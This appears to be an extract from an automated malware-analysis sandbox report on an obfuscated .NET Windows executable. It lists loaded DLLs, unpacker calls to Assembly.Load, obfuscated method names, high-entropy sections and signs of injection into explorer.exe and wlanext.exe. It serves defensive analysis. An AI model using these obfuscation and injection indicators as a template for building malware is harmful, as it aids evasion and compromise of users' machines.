          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeSection loaded: windowscodecs.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windows.cloudstore.schema.shell.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windows.internal.shell.broker.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: mfsrcsnk.dllJump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
          Source: tYEY1UeurGz0Mjb.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: tYEY1UeurGz0Mjb.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: tYEY1UeurGz0Mjb.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: ZrEY.pdb source: tYEY1UeurGz0Mjb.exe
          Source: Binary string: wntdll.pdbUGP source: tYEY1UeurGz0Mjb.exe, 00000003.00000002.2049163251.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, wlanext.exe, 00000005.00000002.4450373088.00000000035C0000.00000040.00001000.00020000.00000000.sdmp, wlanext.exe, 00000005.00000003.2048302242.000000000325A000.00000004.00000020.00020000.00000000.sdmp, wlanext.exe, 00000005.00000003.2050405696.000000000340F000.00000004.00000020.00020000.00000000.sdmp, wlanext.exe, 00000005.00000002.4450373088.000000000375E000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: tYEY1UeurGz0Mjb.exe, tYEY1UeurGz0Mjb.exe, 00000003.00000002.2049163251.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, wlanext.exe, wlanext.exe, 00000005.00000002.4450373088.00000000035C0000.00000040.00001000.00020000.00000000.sdmp, wlanext.exe, 00000005.00000003.2048302242.000000000325A000.00000004.00000020.00020000.00000000.sdmp, wlanext.exe, 00000005.00000003.2050405696.000000000340F000.00000004.00000020.00020000.00000000.sdmp, wlanext.exe, 00000005.00000002.4450373088.000000000375E000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: wlanext.pdb source: tYEY1UeurGz0Mjb.exe, 00000003.00000002.2048827038.0000000001548000.00000004.00000020.00020000.00000000.sdmp, tYEY1UeurGz0Mjb.exe, 00000003.00000002.2050066314.0000000001D10000.00000040.10000000.00040000.00000000.sdmp, wlanext.exe, wlanext.exe, 00000005.00000002.4449293545.0000000000FE0000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: ZrEY.pdbSHA256 source: tYEY1UeurGz0Mjb.exe
          Source: Binary string: wlanext.pdbGCTL source: tYEY1UeurGz0Mjb.exe, 00000003.00000002.2048827038.0000000001548000.00000004.00000020.00020000.00000000.sdmp, tYEY1UeurGz0Mjb.exe, 00000003.00000002.2050066314.0000000001D10000.00000040.10000000.00040000.00000000.sdmp, wlanext.exe, 00000005.00000002.4449293545.0000000000FE0000.00000040.80000000.00040000.00000000.sdmp

          Data Obfuscation

          barindex
          .NET source code contains potential unpacker
          Source: 0.2.tYEY1UeurGz0Mjb.exe.48bfa10.6.raw.unpack, aEgGTusdp8Dk1PnDG2.cs.Net Code: dpaEpnlQP1 System.Reflection.Assembly.Load(byte[])
          Source: 0.2.tYEY1UeurGz0Mjb.exe.484fdf0.5.raw.unpack, aEgGTusdp8Dk1PnDG2.cs.Net Code: dpaEpnlQP1 System.Reflection.Assembly.Load(byte[])
          Source: 0.2.tYEY1UeurGz0Mjb.exe.5640000.7.raw.unpack, -Module-.cs.Net Code: _200D_200D_202B_206F_206A_206B_202B_200B_200D_206D_200C_206B_206A_200B_202E_200C_200E_202A_200E_206D_206F_202D_206F_206D_206C_200F_206A_202D_206C_202B_206A_206F_202A_206A_200E_200F_200B_200F_202E_202D_202E System.Reflection.Assembly.Load(byte[])
          Source: 0.2.tYEY1UeurGz0Mjb.exe.5640000.7.raw.unpack, PingPong.cs.Net Code: _206E_206D_206E_206E_202E_202E_200C_206A_202D_206E_200C_202B_200F_206E_200B_202E_200E_202A_202D_200E_200E_200E_200E_202B_200E_202C_200C_200B_202C_202D_200C_202A_200B_200C_206D_206B_202B_202A_202E_200C_202E System.Reflection.Assembly.Load(byte[])
          Source: 0.2.tYEY1UeurGz0Mjb.exe.75e0000.9.raw.unpack, aEgGTusdp8Dk1PnDG2.cs.Net Code: dpaEpnlQP1 System.Reflection.Assembly.Load(byte[])
          Source: 0.2.tYEY1UeurGz0Mjb.exe.2d04c4c.3.raw.unpack, -Module-.cs.Net Code: _200D_200D_202B_206F_206A_206B_202B_200B_200D_206D_200C_206B_206A_200B_202E_200C_200E_202A_200E_206D_206F_202D_206F_206D_206C_200F_206A_202D_206C_202B_206A_206F_202A_206A_200E_200F_200B_200F_202E_202D_202E System.Reflection.Assembly.Load(byte[])
          Source: 0.2.tYEY1UeurGz0Mjb.exe.2d04c4c.3.raw.unpack, PingPong.cs.Net Code: _206E_206D_206E_206E_202E_202E_200C_206A_202D_206E_200C_202B_200F_206E_200B_202E_200E_202A_202D_200E_200E_200E_200E_202B_200E_202C_200C_200B_202C_202D_200C_202A_200B_200C_206D_206B_202B_202A_202E_200C_202E System.Reflection.Assembly.Load(byte[])
          Source: tYEY1UeurGz0Mjb.exeStatic PE information: 0xD5C8FEB5 [Sat Aug 28 22:56:53 2083 UTC]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 0_2_05249410 push dword ptr [eax+edx-75h]; iretd 0_2_05249492
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 0_2_0766B528 pushad ; iretd 0_2_0766B52D
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 0_2_0766CDED push FFFFFF8Bh; iretd 0_2_0766CDEF
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_00417884 push esp; iretd 3_2_0041788A
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_0041E140 push ebx; ret 3_2_0041E2DC
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_00416958 push ebx; retf 3_2_0041695A
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_0041AAE6 push AD0710D7h; ret 3_2_0041AAED
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_0040E2AD push edi; ret 3_2_0040E2B6
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_00416AB9 push 6DD8D03Bh; retf 3_2_00416ABF
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_0041A3B2 push eax; ret 3_2_0041A3B4
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_0041D4B5 push eax; ret 3_2_0041D508
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_0041D56C push eax; ret 3_2_0041D572
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_0041D502 push eax; ret 3_2_0041D508
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_0041D50B push eax; ret 3_2_0041D572
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_00417741 push 00000072h; retf 3_2_0041776D
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_0041771C push edx; ret 3_2_00417728
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_004077A4 pushfd ; retf 3_2_004077AE
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019A225F pushad ; ret 3_2_019A27F9
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019A27FA pushad ; ret 3_2_019A27F9
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019D09AD push ecx; mov dword ptr [esp], ecx3_2_019D09B6
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019A283D push eax; iretd 3_2_019A2858
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019A1368 push eax; iretd 3_2_019A1369
          Source: C:\Windows\explorer.exeCode function: 4_2_0E77DB1E push esp; retn 0000h4_2_0E77DB1F
          Source: C:\Windows\explorer.exeCode function: 4_2_0E77DB02 push esp; retn 0000h4_2_0E77DB03
          Source: C:\Windows\explorer.exeCode function: 4_2_0E77D9B5 push esp; retn 0000h4_2_0E77DAE7
          Source: C:\Windows\explorer.exeCode function: 4_2_107DBB1E push esp; retn 0000h4_2_107DBB1F
          Source: C:\Windows\explorer.exeCode function: 4_2_107DBB02 push esp; retn 0000h4_2_107DBB03
          Source: C:\Windows\explorer.exeCode function: 4_2_107DB9B5 push esp; retn 0000h4_2_107DBAE7
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_00FF003D push ecx; ret 5_2_00FF0050
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_035C225F pushad ; ret 5_2_035C27F9
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_035C27FA pushad ; ret 5_2_035C27F9
          Source: tYEY1UeurGz0Mjb.exeStatic PE information: section name: .text entropy: 7.953654666683159
          Source: 0.2.tYEY1UeurGz0Mjb.exe.48bfa10.6.raw.unpack, dRsW082dp5fAxcFHX4.csHigh entropy of concatenated method names: 'WGYeQtgTv9', 'YY3eBNmRBs', 'scEeRYtn01', 'wWbe2xnw9q', 'eJ4eVtnFwr', 'n6LeMKUZKV', 'INGe5GhX4T', 'M18elMAqqD', 'i7sehc3Gvs', 'XGIefUfwcC'
          Source: 0.2.tYEY1UeurGz0Mjb.exe.48bfa10.6.raw.unpack, e9CZbZW359uUuG8pVA.csHigh entropy of concatenated method names: 'Dispose', 'CtCSF0rMG9', 'TooHIme06Z', 'BpqttQFnPa', 'u9vSdIMZ2n', 'MwGSzhDqs2', 'ProcessDialogKey', 'DgsHTeCbWE', 'U7XHSK1Qv1', 'rllHHwiEig'
          Source: 0.2.tYEY1UeurGz0Mjb.exe.48bfa10.6.raw.unpack, PiEigedt0UsmrdZqD9.csHigh entropy of concatenated method names: 'Sb7hSNyD43', 'gy3haL0cyE', 'SJQhEQqAol', 'Xo8hch4SaO', 'ObHhWUtdaW', 'BwihtrrOWi', 'BiOh7rNAuS', 'nRPlNBDuMK', 'NpZl6SnnDJ', 'mG2lF5CV9F'
          Source: 0.2.tYEY1UeurGz0Mjb.exe.48bfa10.6.raw.unpack, cBCen5ms7m1F2mpxXh.csHigh entropy of concatenated method names: 'ToString', 'DnNMJDdawF', 'oOhMI9SWb3', 'cErMn4GjEI', 'OnqMYjCE6i', 'XBKMi0AC95', 'Y2PMXxULcR', 'LSdMoukDI7', 'zNGMu0ixhj', 'DDHMZn6Ykb'
          Source: 0.2.tYEY1UeurGz0Mjb.exe.48bfa10.6.raw.unpack, GCkChsROVbbw852kkC.csHigh entropy of concatenated method names: 'h2YWDyJhJK', 'GwLW9HiV0y', 'QvWWmXsyxu', 'MBYWkxE0AX', 'eB0Wbjsb9L', 'OgwW36QTWC', 'zofWNDMxUh', 'XPFW6ncIDb', 'HtXWFXCTNP', 'gGbWdc1x2l'
          Source: 0.2.tYEY1UeurGz0Mjb.exe.48bfa10.6.raw.unpack, sbk0keoLJCvE80kCE0.csHigh entropy of concatenated method names: 'kx1gcuhyQI', 'xUcgex2nfv', 'LCDg7b4hMq', 'UNh7d67bpC', 'erl7zeFt04', 'BbbgTWhouo', 'mvxgSw3cjR', 'cVBgHZFsG2', 'o4YgaaLDaV', 'RNGgE1wxFR'
          Source: 0.2.tYEY1UeurGz0Mjb.exe.48bfa10.6.raw.unpack, aErNlB3Q7IpMi9nowq.csHigh entropy of concatenated method names: 'qDL564wZuF', 'iig5dV0G83', 'imhlTaZAVJ', 'guolShnCh9', 'SHo5JCjX3n', 'Dvm5wwBcwa', 'Bvc5UaipJL', 'IuB5DCO9FM', 'zhl59n09ou', 'OdY5mKCNXV'
          Source: 0.2.tYEY1UeurGz0Mjb.exe.48bfa10.6.raw.unpack, qJfBc610jAt7Z2oxmA.csHigh entropy of concatenated method names: 'xyV7xDMXBF', 'lGb7W2Ao7R', 'F3F7tBu5h2', 'zkv7gVgrLl', 'va77sWX67H', 'Wp0tbHLrc4', 'jcct3GcPh9', 'oLmtNtQsIl', 'OXot6TS57g', 'uxmtFbKJhR'
          Source: 0.2.tYEY1UeurGz0Mjb.exe.48bfa10.6.raw.unpack, QKgkkGSTkErF1qeMB79.csHigh entropy of concatenated method names: 'P2Chv88hLB', 'mgChyZkgi4', 'zmphpn8Gvl', 'U8thQSfAcO', 'sgmhCIqpLT', 'phYhBx8MZc', 'fAxhG5WmnA', 'cfKhRCDWw9', 'oFTh2ZIri0', 'PdGh8tb9J5'
          Source: 0.2.tYEY1UeurGz0Mjb.exe.48bfa10.6.raw.unpack, TEDOsYZeU1iVAGlaOq.csHigh entropy of concatenated method names: 'TT0gveJ5UI', 'IeIgy5ZhbN', 'sAdgpgohQ7', 'txvgQZb7uB', 'XYmgCWBjkV', 'JBUgBgBN8y', 'H0HgGbZiwf', 'BJRgRWWGCe', 'ITkg23bXf4', 'AKYg8ikA7G'
          Source: 0.2.tYEY1UeurGz0Mjb.exe.48bfa10.6.raw.unpack, YAeLnKHbdAT8A7k8kE.csHigh entropy of concatenated method names: 'FynplKXih', 'lvTQfBUP2', 'MixBH9XEy', 'rDLGnbIRb', 'Scc2Z0HMH', 'Sov8bqw6E', 'QkeafikY19cTqLj0Bj', 'HMV9Q1wesJi9eKR4Ol', 'gKnlUmRsI', 'Oe3feWQjC'
          Source: 0.2.tYEY1UeurGz0Mjb.exe.48bfa10.6.raw.unpack, pMZAdbSaDAoeJDfFRno.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'zfIfDDnQxk', 'ayof9IlODx', 'vD8fmHP28f', 'srJfkjemvg', 'l0ofbFwoqB', 'iQXf3WpqIm', 'WCOfNJcpqJ'
          Source: 0.2.tYEY1UeurGz0Mjb.exe.48bfa10.6.raw.unpack, keCbWEFb7XK1Qv1hll.csHigh entropy of concatenated method names: 'CfHl17UxBH', 'yOllIgQQnf', 'jpylnA7cLl', 'dNSlYn8uOk', 'wmVlDLBjU4', 't13likY5Et', 'Next', 'Next', 'Next', 'NextBytes'
          Source: 0.2.tYEY1UeurGz0Mjb.exe.48bfa10.6.raw.unpack, KnBoLaEC5ps0SdFfvX.csHigh entropy of concatenated method names: 'hv1SgCkChs', 'OVbSsbw852', 'FdpSK5fAxc', 'YHXSA4K7kt', 'GojSVZ55Jf', 'Cc6SM0jAt7', 'sCAkQKg2cvqFHCH0B3', 'VrDpJEputIqp0Ulg96', 'cvnSShAnTf', 'kQjSa1gQ5c'
          Source: 0.2.tYEY1UeurGz0Mjb.exe.48bfa10.6.raw.unpack, tT2aB2UoXyApRnSon7.csHigh entropy of concatenated method names: 'dX7LR1vk9V', 'B3OL2xDDy1', 'hnpL1D6Cy6', 'im7LI7s4mD', 'y3ALYW0dt4', 'AEJLi1sOTj', 'GToLoiwNGh', 'mxYLu87ydI', 'EGmLOgQMB6', 'qoZLJWKHMY'
          Source: 0.2.tYEY1UeurGz0Mjb.exe.48bfa10.6.raw.unpack, l7ktCZ8Ijwwk91ojZ5.csHigh entropy of concatenated method names: 'FYwtCMZCJd', 'gTqtG3gJdB', 'XABenZyeeJ', 'QgSeY1bnQ2', 'nOOeipIr4r', 'PqpeXyB4IA', 'rl2eoiVghU', 'xuQeuqmQRv', 'hPyeZgVeUj', 'bxSeOkvgeU'
          Source: 0.2.tYEY1UeurGz0Mjb.exe.48bfa10.6.raw.unpack, aEgGTusdp8Dk1PnDG2.csHigh entropy of concatenated method names: 'ypVaxeNXId', 'X22ac2lT1o', 'lp8aW69TVk', 'QsbaePtRmt', 'NxRatLP8WN', 'fYHa7itBuB', 'ehnagjIMVa', 'hT8ascyKyx', 'QATaqDAYmQ', 'f12aKNDIvB'
          Source: 0.2.tYEY1UeurGz0Mjb.exe.48bfa10.6.raw.unpack, SvIMZ26nZwGhDqs2Rg.csHigh entropy of concatenated method names: 'dyDlcIp0sx', 'nfTlWkgpnw', 'GXpleshfA2', 'aAWltBtUvU', 'hkVl7b1XKR', 'NbwlgLGRvO', 'qhTlsAgoEO', 'f0klqaXkdm', 'ATIlKa7FCD', 'Q3XlA9sMQ9'
          Source: 0.2.tYEY1UeurGz0Mjb.exe.484fdf0.5.raw.unpack, dRsW082dp5fAxcFHX4.csHigh entropy of concatenated method names: 'WGYeQtgTv9', 'YY3eBNmRBs', 'scEeRYtn01', 'wWbe2xnw9q', 'eJ4eVtnFwr', 'n6LeMKUZKV', 'INGe5GhX4T', 'M18elMAqqD', 'i7sehc3Gvs', 'XGIefUfwcC'
          Source: 0.2.tYEY1UeurGz0Mjb.exe.484fdf0.5.raw.unpack, e9CZbZW359uUuG8pVA.csHigh entropy of concatenated method names: 'Dispose', 'CtCSF0rMG9', 'TooHIme06Z', 'BpqttQFnPa', 'u9vSdIMZ2n', 'MwGSzhDqs2', 'ProcessDialogKey', 'DgsHTeCbWE', 'U7XHSK1Qv1', 'rllHHwiEig'
          Source: 0.2.tYEY1UeurGz0Mjb.exe.484fdf0.5.raw.unpack, PiEigedt0UsmrdZqD9.csHigh entropy of concatenated method names: 'Sb7hSNyD43', 'gy3haL0cyE', 'SJQhEQqAol', 'Xo8hch4SaO', 'ObHhWUtdaW', 'BwihtrrOWi', 'BiOh7rNAuS', 'nRPlNBDuMK', 'NpZl6SnnDJ', 'mG2lF5CV9F'
          Source: 0.2.tYEY1UeurGz0Mjb.exe.484fdf0.5.raw.unpack, cBCen5ms7m1F2mpxXh.csHigh entropy of concatenated method names: 'ToString', 'DnNMJDdawF', 'oOhMI9SWb3', 'cErMn4GjEI', 'OnqMYjCE6i', 'XBKMi0AC95', 'Y2PMXxULcR', 'LSdMoukDI7', 'zNGMu0ixhj', 'DDHMZn6Ykb'
          Source: 0.2.tYEY1UeurGz0Mjb.exe.484fdf0.5.raw.unpack, GCkChsROVbbw852kkC.csHigh entropy of concatenated method names: 'h2YWDyJhJK', 'GwLW9HiV0y', 'QvWWmXsyxu', 'MBYWkxE0AX', 'eB0Wbjsb9L', 'OgwW36QTWC', 'zofWNDMxUh', 'XPFW6ncIDb', 'HtXWFXCTNP', 'gGbWdc1x2l'
          Source: 0.2.tYEY1UeurGz0Mjb.exe.484fdf0.5.raw.unpack, sbk0keoLJCvE80kCE0.csHigh entropy of concatenated method names: 'kx1gcuhyQI', 'xUcgex2nfv', 'LCDg7b4hMq', 'UNh7d67bpC', 'erl7zeFt04', 'BbbgTWhouo', 'mvxgSw3cjR', 'cVBgHZFsG2', 'o4YgaaLDaV', 'RNGgE1wxFR'
          Source: 0.2.tYEY1UeurGz0Mjb.exe.484fdf0.5.raw.unpack, aErNlB3Q7IpMi9nowq.csHigh entropy of concatenated method names: 'qDL564wZuF', 'iig5dV0G83', 'imhlTaZAVJ', 'guolShnCh9', 'SHo5JCjX3n', 'Dvm5wwBcwa', 'Bvc5UaipJL', 'IuB5DCO9FM', 'zhl59n09ou', 'OdY5mKCNXV'
          Source: 0.2.tYEY1UeurGz0Mjb.exe.484fdf0.5.raw.unpack, qJfBc610jAt7Z2oxmA.csHigh entropy of concatenated method names: 'xyV7xDMXBF', 'lGb7W2Ao7R', 'F3F7tBu5h2', 'zkv7gVgrLl', 'va77sWX67H', 'Wp0tbHLrc4', 'jcct3GcPh9', 'oLmtNtQsIl', 'OXot6TS57g', 'uxmtFbKJhR'
          Source: 0.2.tYEY1UeurGz0Mjb.exe.484fdf0.5.raw.unpack, QKgkkGSTkErF1qeMB79.csHigh entropy of concatenated method names: 'P2Chv88hLB', 'mgChyZkgi4', 'zmphpn8Gvl', 'U8thQSfAcO', 'sgmhCIqpLT', 'phYhBx8MZc', 'fAxhG5WmnA', 'cfKhRCDWw9', 'oFTh2ZIri0', 'PdGh8tb9J5'
          Source: 0.2.tYEY1UeurGz0Mjb.exe.484fdf0.5.raw.unpack, TEDOsYZeU1iVAGlaOq.csHigh entropy of concatenated method names: 'TT0gveJ5UI', 'IeIgy5ZhbN', 'sAdgpgohQ7', 'txvgQZb7uB', 'XYmgCWBjkV', 'JBUgBgBN8y', 'H0HgGbZiwf', 'BJRgRWWGCe', 'ITkg23bXf4', 'AKYg8ikA7G'
          Source: 0.2.tYEY1UeurGz0Mjb.exe.484fdf0.5.raw.unpack, YAeLnKHbdAT8A7k8kE.csHigh entropy of concatenated method names: 'FynplKXih', 'lvTQfBUP2', 'MixBH9XEy', 'rDLGnbIRb', 'Scc2Z0HMH', 'Sov8bqw6E', 'QkeafikY19cTqLj0Bj', 'HMV9Q1wesJi9eKR4Ol', 'gKnlUmRsI', 'Oe3feWQjC'
          Source: 0.2.tYEY1UeurGz0Mjb.exe.484fdf0.5.raw.unpack, pMZAdbSaDAoeJDfFRno.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'zfIfDDnQxk', 'ayof9IlODx', 'vD8fmHP28f', 'srJfkjemvg', 'l0ofbFwoqB', 'iQXf3WpqIm', 'WCOfNJcpqJ'
          Source: 0.2.tYEY1UeurGz0Mjb.exe.484fdf0.5.raw.unpack, keCbWEFb7XK1Qv1hll.csHigh entropy of concatenated method names: 'CfHl17UxBH', 'yOllIgQQnf', 'jpylnA7cLl', 'dNSlYn8uOk', 'wmVlDLBjU4', 't13likY5Et', 'Next', 'Next', 'Next', 'NextBytes'
          Source: 0.2.tYEY1UeurGz0Mjb.exe.484fdf0.5.raw.unpack, KnBoLaEC5ps0SdFfvX.csHigh entropy of concatenated method names: 'hv1SgCkChs', 'OVbSsbw852', 'FdpSK5fAxc', 'YHXSA4K7kt', 'GojSVZ55Jf', 'Cc6SM0jAt7', 'sCAkQKg2cvqFHCH0B3', 'VrDpJEputIqp0Ulg96', 'cvnSShAnTf', 'kQjSa1gQ5c'
          Source: 0.2.tYEY1UeurGz0Mjb.exe.484fdf0.5.raw.unpack, tT2aB2UoXyApRnSon7.csHigh entropy of concatenated method names: 'dX7LR1vk9V', 'B3OL2xDDy1', 'hnpL1D6Cy6', 'im7LI7s4mD', 'y3ALYW0dt4', 'AEJLi1sOTj', 'GToLoiwNGh', 'mxYLu87ydI', 'EGmLOgQMB6', 'qoZLJWKHMY'
          Source: 0.2.tYEY1UeurGz0Mjb.exe.484fdf0.5.raw.unpack, l7ktCZ8Ijwwk91ojZ5.csHigh entropy of concatenated method names: 'FYwtCMZCJd', 'gTqtG3gJdB', 'XABenZyeeJ', 'QgSeY1bnQ2', 'nOOeipIr4r', 'PqpeXyB4IA', 'rl2eoiVghU', 'xuQeuqmQRv', 'hPyeZgVeUj', 'bxSeOkvgeU'
          Source: 0.2.tYEY1UeurGz0Mjb.exe.484fdf0.5.raw.unpack, aEgGTusdp8Dk1PnDG2.csHigh entropy of concatenated method names: 'ypVaxeNXId', 'X22ac2lT1o', 'lp8aW69TVk', 'QsbaePtRmt', 'NxRatLP8WN', 'fYHa7itBuB', 'ehnagjIMVa', 'hT8ascyKyx', 'QATaqDAYmQ', 'f12aKNDIvB'
          Source: 0.2.tYEY1UeurGz0Mjb.exe.484fdf0.5.raw.unpack, SvIMZ26nZwGhDqs2Rg.csHigh entropy of concatenated method names: 'dyDlcIp0sx', 'nfTlWkgpnw', 'GXpleshfA2', 'aAWltBtUvU', 'hkVl7b1XKR', 'NbwlgLGRvO', 'qhTlsAgoEO', 'f0klqaXkdm', 'ATIlKa7FCD', 'Q3XlA9sMQ9'
          Source: 0.2.tYEY1UeurGz0Mjb.exe.75e0000.9.raw.unpack, dRsW082dp5fAxcFHX4.csHigh entropy of concatenated method names: 'WGYeQtgTv9', 'YY3eBNmRBs', 'scEeRYtn01', 'wWbe2xnw9q', 'eJ4eVtnFwr', 'n6LeMKUZKV', 'INGe5GhX4T', 'M18elMAqqD', 'i7sehc3Gvs', 'XGIefUfwcC'
          Source: 0.2.tYEY1UeurGz0Mjb.exe.75e0000.9.raw.unpack, e9CZbZW359uUuG8pVA.csHigh entropy of concatenated method names: 'Dispose', 'CtCSF0rMG9', 'TooHIme06Z', 'BpqttQFnPa', 'u9vSdIMZ2n', 'MwGSzhDqs2', 'ProcessDialogKey', 'DgsHTeCbWE', 'U7XHSK1Qv1', 'rllHHwiEig'
          Source: 0.2.tYEY1UeurGz0Mjb.exe.75e0000.9.raw.unpack, PiEigedt0UsmrdZqD9.csHigh entropy of concatenated method names: 'Sb7hSNyD43', 'gy3haL0cyE', 'SJQhEQqAol', 'Xo8hch4SaO', 'ObHhWUtdaW', 'BwihtrrOWi', 'BiOh7rNAuS', 'nRPlNBDuMK', 'NpZl6SnnDJ', 'mG2lF5CV9F'
          Source: 0.2.tYEY1UeurGz0Mjb.exe.75e0000.9.raw.unpack, cBCen5ms7m1F2mpxXh.csHigh entropy of concatenated method names: 'ToString', 'DnNMJDdawF', 'oOhMI9SWb3', 'cErMn4GjEI', 'OnqMYjCE6i', 'XBKMi0AC95', 'Y2PMXxULcR', 'LSdMoukDI7', 'zNGMu0ixhj', 'DDHMZn6Ykb'
          Source: 0.2.tYEY1UeurGz0Mjb.exe.75e0000.9.raw.unpack, GCkChsROVbbw852kkC.csHigh entropy of concatenated method names: 'h2YWDyJhJK', 'GwLW9HiV0y', 'QvWWmXsyxu', 'MBYWkxE0AX', 'eB0Wbjsb9L', 'OgwW36QTWC', 'zofWNDMxUh', 'XPFW6ncIDb', 'HtXWFXCTNP', 'gGbWdc1x2l'
          Source: 0.2.tYEY1UeurGz0Mjb.exe.75e0000.9.raw.unpack, sbk0keoLJCvE80kCE0.csHigh entropy of concatenated method names: 'kx1gcuhyQI', 'xUcgex2nfv', 'LCDg7b4hMq', 'UNh7d67bpC', 'erl7zeFt04', 'BbbgTWhouo', 'mvxgSw3cjR', 'cVBgHZFsG2', 'o4YgaaLDaV', 'RNGgE1wxFR'
          Source: 0.2.tYEY1UeurGz0Mjb.exe.75e0000.9.raw.unpack, aErNlB3Q7IpMi9nowq.csHigh entropy of concatenated method names: 'qDL564wZuF', 'iig5dV0G83', 'imhlTaZAVJ', 'guolShnCh9', 'SHo5JCjX3n', 'Dvm5wwBcwa', 'Bvc5UaipJL', 'IuB5DCO9FM', 'zhl59n09ou', 'OdY5mKCNXV'
          Source: 0.2.tYEY1UeurGz0Mjb.exe.75e0000.9.raw.unpack, qJfBc610jAt7Z2oxmA.csHigh entropy of concatenated method names: 'xyV7xDMXBF', 'lGb7W2Ao7R', 'F3F7tBu5h2', 'zkv7gVgrLl', 'va77sWX67H', 'Wp0tbHLrc4', 'jcct3GcPh9', 'oLmtNtQsIl', 'OXot6TS57g', 'uxmtFbKJhR'
          Source: 0.2.tYEY1UeurGz0Mjb.exe.75e0000.9.raw.unpack, QKgkkGSTkErF1qeMB79.csHigh entropy of concatenated method names: 'P2Chv88hLB', 'mgChyZkgi4', 'zmphpn8Gvl', 'U8thQSfAcO', 'sgmhCIqpLT', 'phYhBx8MZc', 'fAxhG5WmnA', 'cfKhRCDWw9', 'oFTh2ZIri0', 'PdGh8tb9J5'
          Source: 0.2.tYEY1UeurGz0Mjb.exe.75e0000.9.raw.unpack, TEDOsYZeU1iVAGlaOq.csHigh entropy of concatenated method names: 'TT0gveJ5UI', 'IeIgy5ZhbN', 'sAdgpgohQ7', 'txvgQZb7uB', 'XYmgCWBjkV', 'JBUgBgBN8y', 'H0HgGbZiwf', 'BJRgRWWGCe', 'ITkg23bXf4', 'AKYg8ikA7G'
          Source: 0.2.tYEY1UeurGz0Mjb.exe.75e0000.9.raw.unpack, YAeLnKHbdAT8A7k8kE.csHigh entropy of concatenated method names: 'FynplKXih', 'lvTQfBUP2', 'MixBH9XEy', 'rDLGnbIRb', 'Scc2Z0HMH', 'Sov8bqw6E', 'QkeafikY19cTqLj0Bj', 'HMV9Q1wesJi9eKR4Ol', 'gKnlUmRsI', 'Oe3feWQjC'
          Source: 0.2.tYEY1UeurGz0Mjb.exe.75e0000.9.raw.unpack, pMZAdbSaDAoeJDfFRno.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'zfIfDDnQxk', 'ayof9IlODx', 'vD8fmHP28f', 'srJfkjemvg', 'l0ofbFwoqB', 'iQXf3WpqIm', 'WCOfNJcpqJ'
          Source: 0.2.tYEY1UeurGz0Mjb.exe.75e0000.9.raw.unpack, keCbWEFb7XK1Qv1hll.csHigh entropy of concatenated method names: 'CfHl17UxBH', 'yOllIgQQnf', 'jpylnA7cLl', 'dNSlYn8uOk', 'wmVlDLBjU4', 't13likY5Et', 'Next', 'Next', 'Next', 'NextBytes'
